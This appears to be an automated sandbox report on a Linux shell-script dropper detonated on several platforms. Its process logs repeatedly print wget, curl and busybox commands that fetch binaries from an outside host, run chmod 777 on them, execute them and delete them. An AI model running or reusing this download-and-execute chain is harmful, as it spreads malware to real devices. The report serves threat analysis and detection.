Analysis Overview
SHA256
1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9
Threat Level: Shows suspicious behavior
The file 1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-24 02:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-24 02:03
Reported
2024-11-24 02:06
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
[/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.15:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-24 02:03
Reported
2024-11-24 02:06
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
29s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
[/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-24 02:03
Reported
2024-11-24 02:06
Platform
debian9-mipsbe-20240611-en
Max time kernel
96s
Max time network
99s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 | /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 | N/A |
| N/A | /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs | /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs | N/A |
| N/A | /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 | /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 | N/A |
| N/A | /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s | /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s | N/A |
| N/A | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | N/A |
| N/A | /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z | /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z | N/A |
| N/A | /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF | /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF | N/A |
| N/A | /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j | /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j | N/A |
| N/A | /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV | /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV | N/A |
| N/A | /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH | /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH | N/A |
| N/A | /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj | /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj | N/A |
| N/A | /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU | /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU | N/A |
| N/A | /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr | /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr | N/A |
| N/A | /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya | /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya | N/A |
| N/A | /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV | /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV | N/A |
| N/A | /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH | /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH | N/A |
| N/A | /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj | /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj | N/A |
| N/A | /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU | /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU | N/A |
| N/A | /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr | /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr | N/A |
| N/A | /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya | /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya | N/A |
| N/A | /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 | /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 | N/A |
| N/A | /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s | /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s | N/A |
| N/A | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | N/A |
| N/A | /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 | /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 | N/A |
| N/A | /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs | /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs | N/A |
| N/A | /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z | /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z | N/A |
| N/A | /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF | /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF | N/A |
| N/A | /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j | /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya | /usr/bin/curl | N/A |
| File opened for modification | /tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF | /usr/bin/curl | N/A |
Processes
/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh
[/tmp/1861a8f25876de90f216fb5e90bd6048469817d5f36eee135cec493751f14ca9.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/bin/chmod
[chmod 777 R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/tmp/R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1
[./R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/bin/rm
[rm R7SUocTyfmAtSoNSJxV4J0igaSwBfldTA1]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/bin/chmod
[chmod 777 GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/tmp/GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs
[./GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/bin/rm
[rm GwXaZ8PWWkRlAxfxD7EeCxUUaFBLDRtOSs]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/bin/chmod
[chmod 777 dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/tmp/dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8
[./dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/bin/rm
[rm dtckiLNHMmMIgyeF2ZmUqqBaqC89XdtNd8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/bin/chmod
[chmod 777 RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/tmp/RFE4eEFRDNymb036q8IndKW8cykv3OBA8s
[./RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/bin/rm
[rm RFE4eEFRDNymb036q8IndKW8cykv3OBA8s]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/bin/chmod
[chmod 777 g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/tmp/g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T
[./g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/bin/rm
[rm g4DsgH63Xo941w62ysNliiPUwEcC8WQq1T]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/bin/chmod
[chmod 777 JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/tmp/JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z
[./JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/bin/rm
[rm JeJKFU6sQ1sqVpgPorqDvu45NrzY5yUz0z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/bin/chmod
[chmod 777 Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/tmp/Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF
[./Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/bin/rm
[rm Tb2H1mGYdMG3CvHiM9VCnX8b3JyQ2olePF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/bin/chmod
[chmod 777 tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/tmp/tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j
[./tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/bin/rm
[rm tlWMRu1LwlRsgGVm4x5v7mXSGGeySgB04j]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/bin/chmod
[chmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV
[./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/bin/rm
[rm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/bin/chmod
[chmod 777 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/tmp/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH
[./3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/bin/rm
[rm 3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/bin/chmod
[chmod 777 Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/tmp/Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj
[./Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/bin/rm
[rm Slf2XiBoIHc7ifkK2WbqAMjvGmbpqZ2mpj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/bin/chmod
[chmod 777 nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/tmp/nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU
[./nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/bin/rm
[rm nRshT0bdSH5JB1uNi2H0zJwOLcHvGx6zgU]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/bin/chmod
[chmod 777 BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/tmp/BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr
[./BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/bin/rm
[rm BIRBlyyAMtQeqqtCuQkNPGmFkeGdu1Aapr]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/bin/chmod
[chmod 777 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/tmp/1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya
[./1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/bin/rm
[rm 1tGliuUb9KSmHUMBb5C3c9gquHrVMvilya]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/bin/chmod
[chmod 777 M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/tmp/M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV
[./M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/bin/rm
[rm M7cVVwmreIcKCaNo2W9c27VaM4JQtzslYV]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3mXX9H7SKLs0SyA1KvEuX8QqyBBp46HRVH]
/bin/busybox
